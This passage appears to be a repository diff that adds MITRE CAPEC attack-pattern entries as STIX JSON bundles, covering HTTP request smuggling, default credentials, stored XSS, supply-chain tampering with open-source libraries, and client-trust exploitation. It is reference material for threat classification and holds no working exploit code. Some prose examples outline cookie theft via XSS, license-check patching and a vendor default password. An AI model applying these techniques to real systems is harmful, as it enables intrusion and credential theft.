{
"source_name": "reference_from_CAPEC",
"description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18",
"external_id": "REF-327"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_prerequisites": [
"Targeted software is utilizing application framework APIs"
],
"x_capec_resources_required": [
"A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy."
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--222cae7b-e00f-48e2-813a-efac031dfa65.json
+79
View File
@@ -0,0 +1,79 @@
{
"type": "bundle",
"id": "bundle--1d807b82-9097-42b9-8679-a87a38d825d9",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--222cae7b-e00f-48e2-813a-efac031dfa65",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "HTTP Request Smuggling",
"description": "HTTP Request Smuggling results from the discrepancies in parsing HTTP requests between HTTP entities such as web caching proxies or application firewalls. Entities such as web servers, web caching proxies, application firewalls or simple proxies often parse HTTP requests in slightly different ways. Under specific situations where there are two or more such entities in the path of the HTTP request, a specially crafted request is seen by two attacked entities as two different sets of requests. This allows certain requests to be smuggled through to a second entity without the first one realizing it.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/33.html",
"external_id": "CAPEC-33"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/444.html",
"external_id": "CWE-444"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/436.html",
"external_id": "CWE-436"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/707.html",
"external_id": "CWE-707"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authorization": [
"Gain Privileges"
],
"Availability": [
"Execute Unauthorized Commands (Run Arbitrary Code)"
],
"Confidentiality": [
"Execute Unauthorized Commands (Run Arbitrary Code)",
"Gain Privileges"
],
"Integrity": [
"Execute Unauthorized Commands (Run Arbitrary Code)",
"Modify Data"
]
},
"x_capec_example_instances": [
"When using Sun Java System Web Proxy Server 3.x or 4.x in conjunction with Sun ONE/iPlanet 6.x, Sun Java System Application Server 7.x or 8.x, it is possible to bypass certain application firewall protections, hijack web sessions, perform Cross Site Scripting or poison the web proxy cache using HTTP Request Smuggling. Differences in the way HTTP requests are parsed by the Proxy Server and the Application Server enable malicious requests to be smuggled through to the Application Server, thereby exposing the Application Server to aforementioned attacks. See also: CVE-2006-6276",
"Apache server 2.0.45 and version before 1.3.34, when used as a proxy, easily lead to web cache poisoning and bypassing of application firewall restrictions because of non-standard HTTP behavior. Although the HTTP/1.1 specification clearly states that a request with both \"Content-Length\" and a \"Transfer-Encoding: chunked\" headers is invalid, vulnerable versions of Apache accept such requests and reassemble the ones with \"Transfer-Encoding: chunked\" header without replacing the existing \"Content-Length\" header or adding its own. This leads to HTTP Request Smuggling using a request with a chunked body and a header with \"Content-Length: 0\". See also: CVE-2005-2088"
],
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"An additional HTTP entity such as an application firewall or a web caching proxy between the attacker and the second entity such as a web server",
"Differences in the way the two HTTP entities parse HTTP requests"
],
"x_capec_resources_required": [
"None: No specialized resources are required to execute this type of attack."
],
"x_capec_skills_required": {
"High": "The attacker has to have detailed knowledge of the HTTP protocol specifics and must also possess exact details on the discrepancies between the two targeted entities in parsing HTTP requests."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--22a69d93-b99a-41c0-b7a6-2a1875317986.json
+29
View File
@@ -0,0 +1,29 @@
{
"type": "bundle",
"id": "bundle--2b5fea7e-973c-4c13-a4c9-1bb7492e4d83",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--22a69d93-b99a-41c0-b7a6-2a1875317986",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "DEPRECATED: Bypassing Card or Badge-Based Systems",
"description": "This attack pattern has been deprecated as it a generalization of CAPEC-397: Cloning Magnetic Strip Cards, CAPEC-398: Magnetic Strip Card Brute Force Attacks, CAPEC-399: Cloning RFID Cards or Chips and CAPEC-400: RFID Chip Deactivation or Destruction. Please refer to these CAPECs going forward.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/396.html",
"external_id": "CAPEC-396"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2372b712-3a94-46d5-86d4-67d489cdbf95.json
+80
View File
@@ -0,0 +1,80 @@
{
"type": "bundle",
"id": "bundle--00038b2c-bd50-405e-8b45-ec63c31e6178",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2372b712-3a94-46d5-86d4-67d489cdbf95",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-08-04T00:00:00.000Z",
"name": "Try Common or Default Usernames and Passwords",
"description": "An adversary may try certain common or default usernames and passwords to gain access into the system and perform unauthorized actions. An adversary may try an intelligent brute force using empty passwords, known vendor default credentials, as well as a dictionary of common usernames and passwords. Many vendor products come preconfigured with default (and thus well-known) usernames and passwords that should be deleted prior to usage in a production environment. It is a common mistake to forget to remove these default login credentials. Another problem is that users would pick very simple (common) passwords (e.g. \"secret\" or \"password\") that make it easier for the attacker to gain access to the system compared to using a brute force attack or even a dictionary attack using a full dictionary.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/70.html",
"external_id": "CAPEC-70"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/521.html",
"external_id": "CWE-521"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/262.html",
"external_id": "CWE-262"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/263.html",
"external_id": "CWE-263"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/798.html",
"external_id": "CWE-798"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/693.html",
"external_id": "CWE-693"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authorization": [
"Gain Privileges"
],
"Confidentiality": [
"Gain Privileges"
]
},
"x_capec_example_instances": [
"User Bob sets his password to \"123\" or literally leaves his password blank. If the system does not have password strength enforcement against a sound password policy, this password may be admitted. Passwords like these two examples are two simple and common passwords that are easily able to be guessed by the adversary.",
"Cisco 2700 Series Wireless Location Appliances (version 2.1.34.0 and earlier) have a default administrator username \"root\" with a password \"password\". This allows remote attackers to easily obtain administrative privileges. See also: CVE-2006-5288"
],
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"The system uses one factor password based authentication.The adversary has the means to interact with the system."
],
"x_capec_resources_required": [
"Technology or vendor specific list of default usernames and passwords."
],
"x_capec_skills_required": {
"Low": "An adversary just needs to gain access to common default usernames/passwords specific to the technologies used by the system. Additionally, a brute force attack leveraging common passwords can be easily realized if the user name is known."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--23ef3396-6a77-4f83-9d9f-7ed7760f35b1.json
+46
View File
@@ -0,0 +1,46 @@
{
"type": "bundle",
"id": "bundle--dbd538ab-7bf7-4b0d-a070-cc6dc89aad7a",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--23ef3396-6a77-4f83-9d9f-7ed7760f35b1",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "Electromagnetic Side-Channel Attack",
"description": "In this attack scenario, the attacker passively monitors electromagnetic emanations that are produced by the targeted electronic device as an unintentional side-effect of its processing. From these emanations, the attacker derives information about the data that is being processed (e.g. the attacker can recover cryptographic keys by monitoring emanations associated with cryptographic processing). This style of attack requires proximal access to the device, however attacks have been demonstrated at public conferences that work at distances of up to 10-15 feet. There have not been any significant studies to determine the maximum practical distance for such attacks. Since the attack is passive, it is nearly impossible to detect and the targeted device will continue to operate as normal after a successful attack.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/622.html",
"external_id": "CAPEC-622"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/201.html",
"external_id": "CWE-201"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Confidentiality": [
"Read Data (Derive sensitive information about encrypted data. For mobile devices, depending on which keys are compromised, the attacker may be able to decrypt VOIP communications, impersonate the targeted caller, or access the enterprise VPN server.)"
]
},
"x_capec_prerequisites": [
"Proximal access to the device."
],
"x_capec_skills_required": {
"Medium": "Sophisticated attack, but detailed techniques published in the open literature."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--24db550f-2f72-42a7-ba11-0050f9180eaa.json
+42
View File
@@ -0,0 +1,42 @@
{
"type": "bundle",
"id": "bundle--4f77aa3b-eb8d-45e9-8754-a4ce16bfd1ab",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--24db550f-2f72-42a7-ba11-0050f9180eaa",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Cellular Data Injection",
"description": "Adversaries inject data into mobile technology traffic (data flows or signaling data) to disrupt communications or conduct additional surveillance operations.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/610.html",
"external_id": "CAPEC-610"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_consequences": {
"Availability": [
"Resource Consumption (Attackers can disrupt or deny mobile technology communications and operations.)",
"Modify Data (Attackers can inject false data into data or signaling system data flows of communications and operations, or re-route data flows or signaling data for the purpose of further data intercept and capture.)"
]
},
"x_capec_prerequisites": [
"None"
],
"x_capec_skills_required": {
"High": "Often achieved by nation states in conjunction with commercial cellular providers to conduct cellular traffic intercept and possible traffic injection."
},
"x_capec_status": "Stable",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--256f9cab-9731-4aa5-9db0-b1c71b4e7377.json
+29
View File
@@ -0,0 +1,29 @@
{
"type": "bundle",
"id": "bundle--7dfeb5e4-f8e2-4d80-bee5-78f0539e6044",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--256f9cab-9731-4aa5-9db0-b1c71b4e7377",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "DEPRECATED: Linux Terminal Injection",
"description": "This attack pattern has been deprecated as it is covered by \"CAPEC-40 : Manipulating Writeable Terminal Devices\". Please refer to this CAPEC going forward.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/249.html",
"external_id": "CAPEC-249"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7.json
+95
View File
@@ -0,0 +1,95 @@
{
"type": "bundle",
"id": "bundle--2de4352f-b764-4069-ae3e-97ec9ef3b6d0",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Exploiting Trust in Client",
"description": "An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/22.html",
"external_id": "CAPEC-22"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/290.html",
"external_id": "CWE-290"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/287.html",
"external_id": "CWE-287"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/20.html",
"external_id": "CWE-20"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/200.html",
"external_id": "CWE-200"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/693.html",
"external_id": "CWE-693"
},
{
"source_name": "reference_from_CAPEC",
"description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
"external_id": "REF-1"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Meta",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authorization": [
"Gain Privileges"
],
"Availability": [
"Execute Unauthorized Commands (Run Arbitrary Code)"
],
"Confidentiality": [
"Execute Unauthorized Commands (Run Arbitrary Code)",
"Gain Privileges",
"Read Data"
],
"Integrity": [
"Execute Unauthorized Commands (Run Arbitrary Code)"
]
},
"x_capec_example_instances": [
"Web applications may use JavaScript to perform client side validation, request encoding/formatting, and other security functions, which provides some usability benefits and eliminates some client-server round-tripping. However, the web server cannot assume that the requests it receives have been subject to those validations, because an attacker can use an alternate method for crafting the HTTP Request and submit data that contains poisoned values designed to spoof a user and/or get the web server to disclose information.",
"Web 2.0 style applications may be particularly vulnerable because they in large part rely on existing infrastructure which provides scalability without the ability to govern the clients. Attackers identify vulnerabilities that either assume the client side is responsible for some security services (without the requisite ability to ensure enforcement of these checks) and/or the lack of a hardened, default deny server configuration that allows for an attacker probing for weaknesses in unexpected ways. Client side validation, request formatting and other services may be performed, but these are strictly usability enhancements not security enhancements.",
"Many web applications use client side scripting like JavaScript to enforce authentication, authorization, session state and other variables, but at the end of day they all make requests to the server. These client side checks may provide usability and performance gains, but they lack integrity in terms of the http request. It is possible for an attacker to post variables directly to the server without using any of the client script security checks and customize the patterns to impersonate other users or probe for more information.",
"Many message oriented middleware systems like MQ Series are rely on information that is passed along with the message request for making authorization decisions, for example what group or role the request should be passed. However, if the message server does not or cannot authenticate the authorization information in the request then the server's policy decisions about authorization are trivial to subvert because the client process can simply elevate privilege by passing in elevated group or role information which the message server accepts and acts on."
],
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"Server software must rely on client side formatted and validated values, and not reinforce these checks on the server side."
],
"x_capec_resources_required": [
"Ability to communicate synchronously or asynchronously with server"
],
"x_capec_skills_required": {
"Medium": "The attacker must have fairly detailed knowledge of the syntax and semantics of client/server communications protocols and grammars"
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--263be634-9e77-4c0b-891f-26a625d3b25d.json
+71
View File
@@ -0,0 +1,71 @@
{
"type": "bundle",
"id": "bundle--c597de69-e406-4b7f-9b02-64f0b2186e0b",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--263be634-9e77-4c0b-891f-26a625d3b25d",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2017-04-15T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Stored XSS",
"description": "This type of attack is a form of Cross-site Scripting (XSS) where a malicious script is persistenly \"stored\" within the data storage of a vulnerable web application. Initially presented by an adversary to the vulnerable web application, the malicious script is incorrectly considered valid input and is not properly encoded by the web application. A victim is then convinced to use the web application in a way that creates a response that includes the malicious script. This response is subsequently sent to the victim and the malicious script is executed by the victim's browser. To launch a successful Stored XSS attack, an adversary looks for places where stored input data is used in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (<img>), or the addition of event attibutes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/592.html",
"external_id": "CAPEC-592"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/79.html",
"external_id": "CWE-79"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)"
],
"Authorization": [
"Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)"
],
"Availability": [
"Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)"
],
"Confidentiality": [
"Read Data (A successful Stored XSS attack can enable an adversary to exfiltrate sensitive information from the application.)",
"Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)",
"Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)"
],
"Integrity": [
"Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)",
"Modify Data (A successful Stored XSS attack can allow an adversary to tamper with application data.)"
]
},
"x_capec_example_instances": [
"An adversary determines that a system uses a web based interface for administration. The adversary creates a new user record and supplies a malicious script in the user name field. The user name field is not validated by the system and a new log entry is created detailing the creation of the new user. Later, an administrator reviews the log in the administrative console. When the administrator comes across the new user entry, the browser sees a script and executes it, stealing the administrator's authentication cookie and forwarding it to the adversary. An adversary then uses the received authentication cookie to log in to the system as an administrator, provided that the administrator console can be accessed remotely.",
"An online discussion forum allows its members to post HTML-enabled messages, which can also include image tags. An adversary embeds JavaScript in the image tags of his message. The adversary then sends the victim an email advertising free goods and provides a link to the form for how to collect. When the victim visits the forum and reads the message, the malicious script is executed within the victim's browser."
],
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"An application that leverages a client-side web browser with scripting enabled.",
"An application that fails to adequately sanitize or encode untrusted input.",
"An application that stores information provided by the user in data storage of some kind."
],
"x_capec_resources_required": [
"None: No specialized resources are required to execute this type of attack."
],
"x_capec_skills_required": {
"Medium": "Requires the ability to write scripts of varying complexity and to inject them through user controlled fields within the application."
},
"x_capec_status": "Stable",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2668fa09-0fe2-45ad-a8c0-7971d8223e6f.json
+46
View File
@@ -0,0 +1,46 @@
{
"type": "bundle",
"id": "bundle--3182e7c5-0470-49fb-a39e-fb01b5d7bee5",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2668fa09-0fe2-45ad-a8c0-7971d8223e6f",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Open Source Libraries Altered",
"description": "An attacker with access to an open source code project (OSS) and knowledge of its particular use for in a system being developed, manufactured, or supported for the victim, can insert malicious code into the open source software used for math libraries in anticipation of inclusion into the system for the purpose of disruption or further compromise within the victim organization.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/538.html",
"external_id": "CAPEC-538"
},
{
"source_name": "reference_from_CAPEC",
"description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation",
"url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf",
"external_id": "REF-439"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_example_instances": [
"An attacker with access to an open source code project introduces a hard-to-find bug in the software that allows under very specific conditions for encryption to be disabled on data streams. The attacker commits the change to the code which is picked up by a manufacturer who develops VPN software. It is eventually deployed at the victim's location where the very specific conditions are met, and the attacker is able to sniff plaintext traffic thought to be encrypted, allowing the attacker to gain access to sensitive data of the victim."
],
"x_capec_likelihood_of_attack": "Low",
"x_capec_prerequisites": [
"Access to the open source code base being used by the manufacturer in a system being developed or currently deployed at a victim location."
],
"x_capec_skills_required": {
"High": "Advanced knowledge about the inclusion and specific usage of an open source code project within system being targeted for infiltration."
},
"x_capec_status": "Stable",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--26cc0860-885f-48e0-9e20-773b4a0d3cd7.json
+94
View File
@@ -0,0 +1,94 @@
{
"type": "bundle",
"id": "bundle--6462a220-58d4-4801-9340-8a8f48fe42de",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--26cc0860-885f-48e0-9e20-773b4a0d3cd7",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Removing Important Client Functionality",
"description": "An attacker removes or disables functionality on the client that the server assumes to be present and trustworthy. Attackers can, in some cases, get around logic put in place to 'guard' sensitive functionality or data. Client applications may include functionality that a server relies on for correct and secure operation. This functionality can include, but is not limited to, filters to prevent the sending of dangerous content to the server, logical functionality such as price calculations, and authentication logic to ensure that only authorized users are utilizing the client. If an attacker can disable this functionality on the client, they can perform actions that the server believes are prohibited. This can result in client behavior that violates assumptions by the server leading to a variety of possible attacks. In the above examples, this could include the sending of dangerous content (such as scripts) to the server, incorrect price calculations, or unauthorized access to server resources.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/207.html",
"external_id": "CAPEC-207"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/602.html",
"external_id": "CWE-602"
},
{
"source_name": "reference_from_CAPEC",
"description": "Wikipedia, The Wikimedia Foundation, Inc",
"url": "http://en.wikipedia.org/wiki/Greasemonkey",
"external_id": "REF-75"
},
{
"source_name": "reference_from_CAPEC",
"description": "Firebug",
"url": "http://getfirebug.com/",
"external_id": "REF-76"
},
{
"source_name": "reference_from_CAPEC",
"description": "Mozilla Firefox Add-ons",
"url": "https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/",
"external_id": "REF-77"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_consequences": {
"Access_Control": [
"Bypass Protection Mechanism"
],
"Accountability": [
"Gain Privileges"
],
"Authentication": [
"Gain Privileges"
],
"Authorization": [
"Gain Privileges",
"Bypass Protection Mechanism"
],
"Confidentiality": [
"Other (Information Leakage)",
"Read Data"
],
"Integrity": [
"Modify Data"
],
"Non-Repudiation": [
"Gain Privileges"
]
},
"x_capec_example_instances": [
"Attacker reverse engineers a Java binary (by decompiling it) and identifies where license management code exists. Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the Attacker simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary.",
"Attacker uses click-through exploration of a Servlet-based website to map out its functionality, taking note of its URL-naming conventions and Servlet mappings. Using this knowledge and guessing the Servlet name of functionality they're not authorized to use, the Attacker directly navigates to the privileged functionality around the authorizing single-front controller (implementing programmatic authorization checks).",
"Attacker reverse-engineers a Java binary (by decompiling it) and identifies where license management code exists. Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the Attacker simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary."
],
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"The targeted server must assume the client performs important actions to protect the server or the server functionality. For example, the server may assume the client filters outbound traffic or that the client performs all price calculations correctly. Moreover, the server must fail to detect when these assumptions are violated by a client."
],
"x_capec_resources_required": [
"The attacker must have access to a client and be able to modify the client behavior, often through reverse engineering. If the server is assuming specific client functionality, this usually means the server only recognizes a specific client application, rather than a broad class of client applications. Reverse engineering tools would likely be necessary."
],
"x_capec_skills_required": {
"High": "To reverse engineer the client-side code to disable/remove the functionality on the client that the server relies on.",
"Low": "The attacker installs a web tool that allows scripts or the DOM model of web-based applications to be modified before they are executed in a browser. GreaseMonkey and Firebug are two examples of such tools."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--27e1e9fc-726a-4ff4-81c1-5ecd490cce03.json
+29
View File
@@ -0,0 +1,29 @@
{
"type": "bundle",
"id": "bundle--1bf1524b-ceb9-4a7f-b235-a4cfdf63f86e",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--27e1e9fc-726a-4ff4-81c1-5ecd490cce03",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-05-01T00:00:00.000Z",
"name": "DEPRECATED: XSS Using Flash",
"description": "This pattern has been deprecated as it is covered by a chaining relationship between CAPEC-174: Flash Parameter Injection and CAPEC-591: Stored XSS. Please refer to these CAPECs going forward.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/246.html",
"external_id": "CAPEC-246"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--28006a72-8857-4c1a-be3e-c392e9291cb5.json
+29
View File
@@ -0,0 +1,29 @@
{
"type": "bundle",
"id": "bundle--68435804-9207-4b57-84c5-a9d17bc079b7",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--28006a72-8857-4c1a-be3e-c392e9291cb5",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Collect Data as Provided by Users",
"description": "An attacker leverages a tool, device, or program to obtain specific information as provided by a user of the target system. This information is often needed by the attacker to launch a follow-on attack. This attack is different than Social Engineering as the adversary is not tricking or deceiving the user. Instead the adversary is putting a mechanism in place that captures the information that a user legitimately enters into a system. Deploying a keylogger, performing a UAC prompt, or wrapping the Windows default credential provider are all examples of such interactions.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/569.html",
"external_id": "CAPEC-569"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_status": "Draft",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--285f4e6f-6fa1-4005-989a-2b1e86e8f1e9.json
+113
View File
@@ -0,0 +1,113 @@
{
"type": "bundle",
"id": "bundle--116186db-704e-4e90-ae33-64cda29251f6",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--285f4e6f-6fa1-4005-989a-2b1e86e8f1e9",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-05-01T00:00:00.000Z",
"name": "Using Malicious Files",
"description": "An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/17.html",
"external_id": "CAPEC-17"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/732.html",
"external_id": "CWE-732"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/285.html",
"external_id": "CWE-285"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/272.html",
"external_id": "CWE-272"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/59.html",
"external_id": "CWE-59"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/282.html",
"external_id": "CWE-282"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/275.html",
"external_id": "CWE-275"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/264.html",
"external_id": "CWE-264"
},
{
"source_name": "cwe",
